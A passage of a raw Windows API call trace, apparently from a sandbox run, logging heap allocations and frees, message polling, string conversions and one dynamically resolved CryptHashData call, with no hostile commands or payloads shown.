lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0230.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0230.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0230.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.833] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550d8 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0230.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0230.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f38 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55018, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0230.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0230.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0230.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0230.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0230.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0230.853] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0230.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.853] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0230.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e513d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0230.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0230.854] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0230.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0230.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.854] CryptHashData (hHash=0xa87490, pbData=0x2e550d8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0230.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0230.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0230.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 